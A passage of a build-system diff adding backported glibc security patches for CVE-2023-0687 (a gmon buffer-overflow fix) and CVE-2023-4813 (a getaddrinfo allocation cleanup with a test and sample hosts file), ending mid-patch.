+From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
+ =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
+Date: Sat, 4 Feb 2023 14:41:38 +0300
+Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `__monstartup()` allocates a buffer used to store all the data
+accumulated by the monitor.
+
+The size of this buffer depends on the size of the internal structures
+used and the address range for which the monitor is activated, as well
+as on the maximum density of call instructions and/or callable functions
+that could be potentially on a segment of executable code.
+
+In particular a hash table of arcs is placed at the end of this buffer.
+The size of this hash table is calculated in bytes as
+ p->fromssize = p->textsize / HASHFRACTION;
+
+but actually should be
+ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+
+This results in writing beyond the end of the allocated buffer when an
+added arc corresponds to a call near from the end of the monitored
+address range, since `_mcount()` check the incoming caller address for
+monitored range but not the intermediate result hash-like index that
+uses to write into the table.
+
+It should be noted that when the results are output to `gmon.out`, the
+table is read to the last element calculated from the allocated size in
+bytes, so the arcs stored outside the buffer boundary did not fall into
+`gprof` for analysis. Thus this "feature" help me to found this bug
+during working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
+
+Just in case, I will explicitly note that the problem breaks the
+`make test t=gmon/tst-gmon-dso` added for Bug 29438.
+There, the arc of the `f3()` call disappears from the output, since in
+the DSO case, the call to `f3` is located close to the end of the
+monitored range.
+
+Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
+
+Another minor error seems a related typo in the calculation of
+`kcountsize`, but since kcounts are smaller than froms, this is
+actually to align the p->froms data.
+
+Co-authored-by: DJ Delorie <dj@redhat.com>
+Reviewed-by: Carlos O'Donell <carlos@redhat.com>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
+CVE: CVE-2023-0687
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ gmon/gmon.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/gmon/gmon.c b/gmon/gmon.c
+index dee6480..bf76358 100644
+--- a/gmon/gmon.c
++++ b/gmon/gmon.c
+@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
+ p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->textsize = p->highpc - p->lowpc;
++ /* This looks like a typo, but it's here to align the p->froms
++ section. */
+ p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
+ p->hashfraction = HASHFRACTION;
+ p->log_hashfraction = -1;
+@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
+ instead of integer division. Precompute shift amount. */
+ p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
+ }
+- p->fromssize = p->textsize / HASHFRACTION;
++ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+ p->tolimit = p->textsize * ARCDENSITY / 100;
+ if (p->tolimit < MINARCS)
+ p->tolimit = MINARCS;
+--
+2.7.4
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
+From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Date: Thu, 17 Mar 2022 11:44:34 +0530
+Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
+ #28931]
+
+Allocations for address tuples is currently a bit confusing because of
+the pointer chasing through PAT, making it hard to observe the sequence
+in which allocations have been made. Narrow scope of the pointer
+chasing through PAT so that it is only used where necessary.
+
+This also tightens actions behaviour with the hosts database in
+getaddrinfo to comply with the manual text. The "continue" action
+discards previous results and the "merge" action results in an immedate
+lookup failure. Consequently, chaining of allocations across modules is
+no longer necessary, thus opening up cleanup opportunities.
+
+A test has been added that checks some combinations to ensure that they
+work correctly.
+
+Resolves: BZ #28931
+
+CVE: CVE-2023-4813
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
+Comments: Hunks refreshed
+
+Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Reviewed-by: DJ Delorie <dj@redhat.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ nss/Makefile | 1 +
+ nss/tst-nss-gai-actions.c | 149 ++++++
+ nss/tst-nss-gai-actions.root/etc/host.conf | 1 +
+ nss/tst-nss-gai-actions.root/etc/hosts | 508 +++++++++++++++++++++
+ sysdeps/posix/getaddrinfo.c | 143 +++---
+ 5 files changed, 750 insertions(+), 52 deletions(-)
+ create mode 100644 nss/tst-nss-gai-actions.c
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
+
+diff --git a/nss/Makefile b/nss/Makefile
+index 42a59535cb..d8b06b44fb 100644
+--- a/nss/Makefile
++++ b/nss/Makefile
+@@ -61,6 +61,7 @@
+
+ tests-container = \
+ tst-nss-test3 \
++ tst-nss-gai-actions \
+ tst-nss-files-hosts-long \
+ tst-nss-db-endpwent \
+ tst-nss-db-endgrent
+diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
+new file mode 100644
+index 0000000000..efca6cd183
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.c
+@@ -0,0 +1,149 @@
++/* Test continue and merge NSS actions for getaddrinfo.
++ Copyright The GNU Toolchain Authors.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <gnu/lib-names.h>
++#include <nss.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++
++#include <support/check.h>
++#include <support/format_nss.h>
++#include <support/support.h>
++#include <support/xstdio.h>
++#include <support/xunistd.h>
++
++enum
++{
++ ACTION_MERGE = 0,
++ ACTION_CONTINUE,
++};
++
++static const char *
++family_str (int family)
++{
++ switch (family)
++ {
++ case AF_UNSPEC:
++ return "AF_UNSPEC";
++ case AF_INET:
++ return "AF_INET";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static const char *
++action_str (int action)
++{
++ switch (action)
++ {
++ case ACTION_MERGE:
++ return "merge";
++ case ACTION_CONTINUE:
++ return "continue";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test (int action, int family, bool canon)
++{
++ struct addrinfo hints =
++ {
++ .ai_family = family,
++ };
++
++ struct addrinfo *ai;
++
++ if (canon)
++ hints.ai_flags = AI_CANONNAME;
++
++ printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
++ action_str (action), family_str (family),
++ canon ? "AI_CANONNAME" : "");
++
++ int ret = getaddrinfo ("example.org", "80", &hints, &ai);
++
++ switch (action)
++ {
++ case ACTION_MERGE:
++ if (ret == 0)
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ printf ("merge unexpectedly succeeded:\n %s\n", formatted);
++ support_record_failure ();
++ free (formatted);
++ }
++ else
++ return;
++ case ACTION_CONTINUE:
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ /* Verify that the result appears exactly once. */
++ const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
++ "address: DGRAM/UDP 192.0.0.1 80\n"
++ "address: RAW/IP 192.0.0.1 80\n";
++
++ const char *contains = strstr (formatted, expected);
++ const char *contains2 = NULL;
++
++ if (contains != NULL)
++ contains2 = strstr (contains + strlen (expected), expected);
++
++ if (contains == NULL || contains2 != NULL)
++ {
++ printf ("continue failed:\n%s\n", formatted);
++ support_record_failure ();
++ }
++
++ free (formatted);
++ break;
++ }
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test_set (int action)
++{
++ char buf[32];
++
++ snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
++ action_str (action));
++ __nss_configure_lookup ("hosts", buf);
++
++ do_one_test (action, AF_UNSPEC, false);
++ do_one_test (action, AF_INET, false);
++ do_one_test (action, AF_INET, true);
++}
++
++static int
++do_test (void)
++{
++ do_one_test_set (ACTION_CONTINUE);
++ do_one_test_set (ACTION_MERGE);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
+new file mode 100644
+index 0000000000..d1a59f73a9
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/host.conf
+@@ -0,0 +1 @@
++multi on
+diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
+new file mode 100644
+index 0000000000..50ce9774dc
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/hosts
+@@ -0,0 +1,508 @@
++192.0.0.1 example.org
++192.0.0.2 example.org
++192.0.0.3 example.org
++192.0.0.4 example.org
++192.0.0.5 example.org
++192.0.0.6 example.org
++192.0.0.7 example.org
++192.0.0.8 example.org
++192.0.0.9 example.org
++192.0.0.10 example.org
++192.0.0.11 example.org
++192.0.0.12 example.org
++192.0.0.13 example.org
++192.0.0.14 example.org
++192.0.0.15 example.org
++192.0.0.16 example.org
++192.0.0.17 example.org
++192.0.0.18 example.org
++192.0.0.19 example.org
++192.0.0.20 example.org
++192.0.0.21 example.org
++192.0.0.22 example.org
++192.0.0.23 example.org
++192.0.0.24 example.org
++192.0.0.25 example.org
++192.0.0.26 example.org
++192.0.0.27 example.org
++192.0.0.28 example.org
++192.0.0.29 example.org
++192.0.0.30 example.org
++192.0.0.31 example.org
++192.0.0.32 example.org
++192.0.0.33 example.org
++192.0.0.34 example.org
++192.0.0.35 example.org
++192.0.0.36 example.org
++192.0.0.37 example.org
++192.0.0.38 example.org
++192.0.0.39 example.org
++192.0.0.40 example.org
++192.0.0.41 example.org
++192.0.0.42 example.org
++192.0.0.43 example.org
++192.0.0.44 example.org
++192.0.0.45 example.org
++192.0.0.46 example.org
++192.0.0.47 example.org
++192.0.0.48 example.org
++192.0.0.49 example.org
++192.0.0.50 example.org
++192.0.0.51 example.org
++192.0.0.52 example.org
++192.0.0.53 example.org
++192.0.0.54 example.org
++192.0.0.55 example.org
++192.0.0.56 example.org
++192.0.0.57 example.org
++192.0.0.58 example.org
++192.0.0.59 example.org
++192.0.0.60 example.org
++192.0.0.61 example.org
++192.0.0.62 example.org
++192.0.0.63 example.org
++192.0.0.64 example.org
++192.0.0.65 example.org
++192.0.0.66 example.org
++192.0.0.67 example.org
++192.0.0.68 example.org
++192.0.0.69 example.org
++192.0.0.70 example.org
++192.0.0.71 example.org
++192.0.0.72 example.org
++192.0.0.73 example.org
++192.0.0.74 example.org
++192.0.0.75 example.org
++192.0.0.76 example.org
++192.0.0.77 example.org
++192.0.0.78 example.org
++192.0.0.79 example.org
++192.0.0.80 example.org
++192.0.0.81 example.org
++192.0.0.82 example.org
++192.0.0.83 example.org
++192.0.0.84 example.org
++192.0.0.85 example.org
++192.0.0.86 example.org
++192.0.0.87 example.org
++192.0.0.88 example.org
++192.0.0.89 example.org
++192.0.0.90 example.org
++192.0.0.91 example.org
++192.0.0.92 example.org
++192.0.0.93 example.org
++192.0.0.94 example.org
++192.0.0.95 example.org
++192.0.0.96 example.org
++192.0.0.97 example.org
++192.0.0.98 example.org
++192.0.0.99 example.org
++192.0.0.100 example.org
++192.0.0.101 example.org
++192.0.0.102 example.org
++192.0.0.103 example.org
++192.0.0.104 example.org
++192.0.0.105 example.org
++192.0.0.106 example.org
++192.0.0.107 example.org
++192.0.0.108 example.org
++192.0.0.109 example.org
++192.0.0.110 example.org
++192.0.0.111 example.org
++192.0.0.112 example.org
++192.0.0.113 example.org
++192.0.0.114 example.org
++192.0.0.115 example.org
++192.0.0.116 example.org
++192.0.0.117 example.org
++192.0.0.118 example.org
++192.0.0.119 example.org
++192.0.0.120 example.org
++192.0.0.121 example.org
++192.0.0.122 example.org
++192.0.0.123 example.org
++192.0.0.124 example.org
++192.0.0.125 example.org
++192.0.0.126 example.org
++192.0.0.127 example.org
++192.0.0.128 example.org
++192.0.0.129 example.org
++192.0.0.130 example.org
++192.0.0.131 example.org
++192.0.0.132 example.org
++192.0.0.133 example.org
++192.0.0.134 example.org
++192.0.0.135 example.org
++192.0.0.136 example.org
++192.0.0.137 example.org
++192.0.0.138 example.org
++192.0.0.139 example.org
++192.0.0.140 example.org
++192.0.0.141 example.org
++192.0.0.142 example.org
++192.0.0.143 example.org
++192.0.0.144 example.org
++192.0.0.145 example.org
++192.0.0.146 example.org
++192.0.0.147 example.org
++192.0.0.148 example.org
++192.0.0.149 example.org
++192.0.0.150 example.org
++192.0.0.151 example.org
++192.0.0.152 example.org
++192.0.0.153 example.org
++192.0.0.154 example.org
++192.0.0.155 example.org
++192.0.0.156 example.org
++192.0.0.157 example.org
++192.0.0.158 example.org
++192.0.0.159 example.org
++192.0.0.160 example.org
++192.0.0.161 example.org
++192.0.0.162 example.org
++192.0.0.163 example.org
++192.0.0.164 example.org
++192.0.0.165 example.org
++192.0.0.166 example.org
++192.0.0.167 example.org
++192.0.0.168 example.org
++192.0.0.169 example.org
++192.0.0.170 example.org
++192.0.0.171 example.org
++192.0.0.172 example.org
++192.0.0.173 example.org
++192.0.0.174 example.org
++192.0.0.175 example.org
++192.0.0.176 example.org
++192.0.0.177 example.org
++192.0.0.178 example.org
++192.0.0.179 example.org
++192.0.0.180 example.org
++192.0.0.181 example.org
++192.0.0.182 example.org
++192.0.0.183 example.org
++192.0.0.184 example.org
++192.0.0.185 example.org
++192.0.0.186 example.org
++192.0.0.187 example.org
++192.0.0.188 example.org
++192.0.0.189 example.org
++192.0.0.190 example.org
++192.0.0.191 example.org
++192.0.0.192 example.org
++192.0.0.193 example.org
++192.0.0.194 example.org
++192.0.0.195 example.org
++192.0.0.196 example.org
++192.0.0.197 example.org
++192.0.0.198 example.org
++192.0.0.199 example.org
++192.0.0.200 example.org
++192.0.0.201 example.org
++192.0.0.202 example.org
++192.0.0.203 example.org
++192.0.0.204 example.org
++192.0.0.205 example.org
++192.0.0.206 example.org
++192.0.0.207 example.org
++192.0.0.208 example.org
++192.0.0.209 example.org
++192.0.0.210 example.org
++192.0.0.211 example.org
++192.0.0.212 example.org
++192.0.0.213 example.org
++192.0.0.214 example.org
++192.0.0.215 example.org
++192.0.0.216 example.org
++192.0.0.217 example.org
++192.0.0.218 example.org
++192.0.0.219 example.org
++192.0.0.220 example.org
++192.0.0.221 example.org
++192.0.0.222 example.org
++192.0.0.223 example.org
++192.0.0.224 example.org
++192.0.0.225 example.org
++192.0.0.226 example.org
++192.0.0.227 example.org
++192.0.0.228 example.org
++192.0.0.229 example.org
++192.0.0.230 example.org
++192.0.0.231 example.org
++192.0.0.232 example.org
++192.0.0.233 example.org
++192.0.0.234 example.org
++192.0.0.235 example.org
++192.0.0.236 example.org
++192.0.0.237 example.org
++192.0.0.238 example.org
++192.0.0.239 example.org
++192.0.0.240 example.org
++192.0.0.241 example.org
++192.0.0.242 example.org
++192.0.0.243 example.org
++192.0.0.244 example.org
++192.0.0.245 example.org
++192.0.0.246 example.org
++192.0.0.247 example.org
++192.0.0.248 example.org
++192.0.0.249 example.org
++192.0.0.250 example.org
++192.0.0.251 example.org
++192.0.0.252 example.org
++192.0.0.253 example.org
++192.0.0.254 example.org
++192.0.1.1 example.org
++192.0.1.2 example.org
++192.0.1.3 example.org
++192.0.1.4 example.org
++192.0.1.5 example.org
++192.0.1.6 example.org
++192.0.1.7 example.org
++192.0.1.8 example.org
++192.0.1.9 example.org
++192.0.1.10 example.org
++192.0.1.11 example.org
++192.0.1.12 example.org
++192.0.1.13 example.org
++192.0.1.14 example.org
++192.0.1.15 example.org
++192.0.1.16 example.org
++192.0.1.17 example.org
++192.0.1.18 example.org
++192.0.1.19 example.org
++192.0.1.20 example.org
++192.0.1.21 example.org
++192.0.1.22 example.org
++192.0.1.23 example.org
++192.0.1.24 example.org
++192.0.1.25 example.org
++192.0.1.26 example.org
++192.0.1.27 example.org
++192.0.1.28 example.org
++192.0.1.29 example.org
++192.0.1.30 example.org
++192.0.1.31 example.org
++192.0.1.32 example.org
++192.0.1.33 example.org
++192.0.1.34 example.org
++192.0.1.35 example.org
++192.0.1.36 example.org
++192.0.1.37 example.org
++192.0.1.38 example.org
++192.0.1.39 example.org
++192.0.1.40 example.org
++192.0.1.41 example.org
++192.0.1.42 example.org
++192.0.1.43 example.org
++192.0.1.44 example.org
++192.0.1.45 example.org
++192.0.1.46 example.org
++192.0.1.47 example.org
++192.0.1.48 example.org
++192.0.1.49 example.org
++192.0.1.50 example.org
++192.0.1.51 example.org
++192.0.1.52 example.org
++192.0.1.53 example.org
++192.0.1.54 example.org
++192.0.1.55 example.org
++192.0.1.56 example.org
++192.0.1.57 example.org
++192.0.1.58 example.org
++192.0.1.59 example.org
++192.0.1.60 example.org
++192.0.1.61 example.org
++192.0.1.62 example.org
++192.0.1.63 example.org
++192.0.1.64 example.org
++192.0.1.65 example.org
++192.0.1.66 example.org
++192.0.1.67 example.org
++192.0.1.68 example.org
++192.0.1.69 example.org
++192.0.1.70 example.org
++192.0.1.71 example.org
++192.0.1.72 example.org
++192.0.1.73 example.org
++192.0.1.74 example.org
++192.0.1.75 example.org
++192.0.1.76 example.org
++192.0.1.77 example.org
++192.0.1.78 example.org
++192.0.1.79 example.org
++192.0.1.80 example.org
++192.0.1.81 example.org
++192.0.1.82 example.org
++192.0.1.83 example.org
++192.0.1.84 example.org
++192.0.1.85 example.org
++192.0.1.86 example.org
++192.0.1.87 example.org
++192.0.1.88 example.org
++192.0.1.89 example.org
++192.0.1.90 example.org
++192.0.1.91 example.org
++192.0.1.92 example.org
++192.0.1.93 example.org
++192.0.1.94 example.org
++192.0.1.95 example.org
++192.0.1.96 example.org
++192.0.1.97 example.org
++192.0.1.98 example.org
++192.0.1.99 example.org
++192.0.1.100 example.org
++192.0.1.101 example.org
++192.0.1.102 example.org
++192.0.1.103 example.org
++192.0.1.104 example.org
++192.0.1.105 example.org
++192.0.1.106 example.org
++192.0.1.107 example.org
++192.0.1.108 example.org
++192.0.1.109 example.org
++192.0.1.110 example.org
++192.0.1.111 example.org
++192.0.1.112 example.org
++192.0.1.113 example.org
++192.0.1.114 example.org
++192.0.1.115 example.org
++192.0.1.116 example.org
++192.0.1.117 example.org
++192.0.1.118 example.org
++192.0.1.119 example.org
++192.0.1.120 example.org
++192.0.1.121 example.org
++192.0.1.122 example.org
++192.0.1.123 example.org
++192.0.1.124 example.org
++192.0.1.125 example.org
++192.0.1.126 example.org
++192.0.1.127 example.org
++192.0.1.128 example.org
++192.0.1.129 example.org
++192.0.1.130 example.org
++192.0.1.131 example.org
++192.0.1.132 example.org
++192.0.1.133 example.org
++192.0.1.134 example.org
++192.0.1.135 example.org
++192.0.1.136 example.org
++192.0.1.137 example.org
++192.0.1.138 example.org
++192.0.1.139 example.org
++192.0.1.140 example.org
++192.0.1.141 example.org
++192.0.1.142 example.org
++192.0.1.143 example.org
++192.0.1.144 example.org
++192.0.1.145 example.org
++192.0.1.146 example.org
++192.0.1.147 example.org
++192.0.1.148 example.org
++192.0.1.149 example.org
++192.0.1.150 example.org
++192.0.1.151 example.org
++192.0.1.152 example.org
++192.0.1.153 example.org
++192.0.1.154 example.org
++192.0.1.155 example.org
++192.0.1.156 example.org
++192.0.1.157 example.org
++192.0.1.158 example.org
++192.0.1.159 example.org
++192.0.1.160 example.org
++192.0.1.161 example.org
++192.0.1.162 example.org
++192.0.1.163 example.org
++192.0.1.164 example.org
++192.0.1.165 example.org
++192.0.1.166 example.org
++192.0.1.167 example.org
++192.0.1.168 example.org
++192.0.1.169 example.org
++192.0.1.170 example.org
++192.0.1.171 example.org
++192.0.1.172 example.org
++192.0.1.173 example.org
++192.0.1.174 example.org
++192.0.1.175 example.org
++192.0.1.176 example.org
++192.0.1.177 example.org
++192.0.1.178 example.org
++192.0.1.179 example.org
++192.0.1.180 example.org
++192.0.1.181 example.org
++192.0.1.182 example.org
++192.0.1.183 example.org
++192.0.1.184 example.org
++192.0.1.185 example.org
++192.0.1.186 example.org
++192.0.1.187 example.org
++192.0.1.188 example.org
++192.0.1.189 example.org
++192.0.1.190 example.org
++192.0.1.191 example.org
++192.0.1.192 example.org
++192.0.1.193 example.org
++192.0.1.194 example.org
++192.0.1.195 example.org
++192.0.1.196 example.org
++192.0.1.197 example.org
++192.0.1.198 example.org
++192.0.1.199 example.org
++192.0.1.200 example.org
++192.0.1.201 example.org
++192.0.1.202 example.org
++192.0.1.203 example.org
++192.0.1.204 example.org
++192.0.1.205 example.org
++192.0.1.206 example.org
++192.0.1.207 example.org
++192.0.1.208 example.org
++192.0.1.209 example.org
++192.0.1.210 example.org
++192.0.1.211 example.org
++192.0.1.212 example.org
++192.0.1.213 example.org
++192.0.1.214 example.org
++192.0.1.215 example.org
++192.0.1.216 example.org
++192.0.1.217 example.org
++192.0.1.218 example.org
++192.0.1.219 example.org
++192.0.1.220 example.org
++192.0.1.221 example.org
++192.0.1.222 example.org
++192.0.1.223 example.org
++192.0.1.224 example.org
++192.0.1.225 example.org
++192.0.1.226 example.org
++192.0.1.227 example.org
++192.0.1.228 example.org
++192.0.1.229 example.org
++192.0.1.230 example.org
++192.0.1.231 example.org
++192.0.1.232 example.org
++192.0.1.233 example.org
++192.0.1.234 example.org
++192.0.1.235 example.org
++192.0.1.236 example.org
++192.0.1.237 example.org
++192.0.1.238 example.org
++192.0.1.239 example.org
++192.0.1.240 example.org
++192.0.1.241 example.org
++192.0.1.242 example.org
++192.0.1.243 example.org
++192.0.1.244 example.org
++192.0.1.245 example.org
++192.0.1.246 example.org
++192.0.1.247 example.org
++192.0.1.248 example.org
++192.0.1.249 example.org
++192.0.1.250 example.org
++192.0.1.251 example.org
++192.0.1.252 example.org
++192.0.1.253 example.org
++192.0.1.254 example.org
+diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
+index 18dccd5924..3d9bea60c6 100644
+--- a/sysdeps/posix/getaddrinfo.c
++++ b/sysdeps/posix/getaddrinfo.c
+@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (name != NULL)
+ {
+- at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
+- at->family = AF_UNSPEC;
+- at->scopeid = 0;
+- at->next = NULL;
+-
+ if (req->ai_flags & AI_IDN)
+ {
+ char *out;
+@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ malloc_name = true;
+ }
+
+- if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
++ uint32_t addr[4];
++ if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
+ {
++ at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
+ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
+- at->family = AF_INET;
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET;
++ }
+ else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
+ {
+- at->addr[3] = at->addr[0];
++ at->addr[3] = addr[0];
+ at->addr[2] = htonl (0xffff);
+ at->addr[1] = 0;
+ at->addr[0] = 0;
+@@ -505,49 +505,62 @@
+
+ if (req->ai_flags & AI_CANONNAME)
+ canon = name;
++
++ goto process_list;
+ }
+- else if (at->family == AF_UNSPEC)
++
++ char *scope_delim = strchr (name, SCOPE_DELIMITER);
++ int e;
++
++ if (scope_delim == NULL)
++ e = inet_pton (AF_INET6, name, addr);
++ else
++ e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
++
++ if (e > 0)
+ {
+- char *scope_delim = strchr (name, SCOPE_DELIMITER);
+- int e;
+- if (scope_delim == NULL)
+- e = inet_pton (AF_INET6, name, at->addr);
++ at = alloca_account (sizeof (struct gaih_addrtuple),
++ alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
++ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET6;
++ }
++ else if (req->ai_family == AF_INET
++ && IN6_IS_ADDR_V4MAPPED (addr))
++ {
++ at->addr[0] = addr[3];
++ at->addr[1] = addr[1];
++ at->addr[2] = addr[2];
++ at->addr[3] = addr[3];
++ at->family = AF_INET;
++ }
+ else
+- e = __inet_pton_length (AF_INET6, name, scope_delim - name,
+- at->addr);
+- if (e > 0)
+ {
+- if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
+- at->family = AF_INET6;
+- else if (req->ai_family == AF_INET
+- && IN6_IS_ADDR_V4MAPPED (at->addr))
+- {
+- at->addr[0] = at->addr[3];
+- at->family = AF_INET;
+- }
+- else
+- {
+- result = -EAI_ADDRFAMILY;
+- goto free_and_return;
+- }
+-
+- if (scope_delim != NULL
+- && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
+- scope_delim + 1,
+- &at->scopeid) != 0)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
++ result = -EAI_ADDRFAMILY;
++ goto free_and_return;
++ }
+
+- if (req->ai_flags & AI_CANONNAME)
+- canon = name;
++ if (scope_delim != NULL
++ && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
++ scope_delim + 1,
++ &at->scopeid) != 0)
++ {
++ result = -EAI_NONAME;
++ goto free_and_return;
+ }
++
++ if (req->ai_flags & AI_CANONNAME)
++ canon = name;
++
++ goto process_list;
+ }
+
+- if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
++ if ((req->ai_flags & AI_NUMERICHOST) == 0)
+ {
+- struct gaih_addrtuple **pat = &at;
+ int no_data = 0;
+ int no_inet6_data = 0;
+ service_user *nip;
+@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ enum nss_status status = NSS_STATUS_UNAVAIL;
+ int no_more;
+ struct resolv_context *res_ctx = NULL;
++ bool do_merge = false;
+
+ /* If we do not have to look for IPv6 addresses or the canonical
+ name, use the simple, old functions, which do not support
+@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ result = -EAI_MEMORY;
+ goto free_and_return;
+ }
+- *pat = addrmem;
++ at = addrmem;
+ }
+ else
+ {
+@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ struct gaih_addrtuple *addrfree = addrmem;
++ struct gaih_addrtuple **pat = &at;
++
+ for (int i = 0; i < air->naddrs; ++i)
+ {
+ socklen_t size = (air->family[i] == AF_INET
+@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ free (air);
+
+- if (at->family == AF_UNSPEC)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
+-
+ goto process_list;
+ }
+ else if (err == 0)
+@@ -750,6 +763,22 @@
+
+ while (!no_more)
+ {
++ /* Always start afresh; continue should discard previous results
++ and the hosts database does not support merge. */
++ at = NULL;
++ free (canonbuf);
++ free (addrmem);
++ canon = canonbuf = NULL;
++ addrmem = NULL;
++ got_ipv6 = false;
++
++ if (do_merge)
++ {
++ __set_h_errno (NETDB_INTERNAL);
++ __set_errno (EBUSY);
++ break;
++ }
++
+ no_data = 0;
+ nss_gethostbyname4_r fct4 = NULL;
+
+@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ {
+ while (1)
+ {
+- status = DL_CALL_FCT (fct4, (name, pat,
++ status = DL_CALL_FCT (fct4, (name, &at,
+ tmpbuf->data, tmpbuf->length,
+ &errno, &h_errno,
+ NULL));
+ if (status == NSS_STATUS_SUCCESS)
+ break;
++ /* gethostbyname4_r may write into AT, so reset it. */
++ at = NULL;
+ if (status != NSS_STATUS_TRYAGAIN
+ || errno != ERANGE || h_errno != NETDB_INTERNAL)
+ {
+@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ no_data = 1;
+
+ if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
+- canon = (*pat)->name;
++ canon = at->name;
++
++ struct gaih_addrtuple **pat = &at;
+
+ while (*pat != NULL)
+ {
+@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (fct != NULL)
+ {
++ struct gaih_addrtuple **pat = &at;
++
+ if (req->ai_family == AF_INET6
+ || req->ai_family == AF_UNSPEC)
+ {
+@@ -917,6 +946,10 @@
+ if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
+ break;
+
++ /* The hosts database does not support MERGE. */
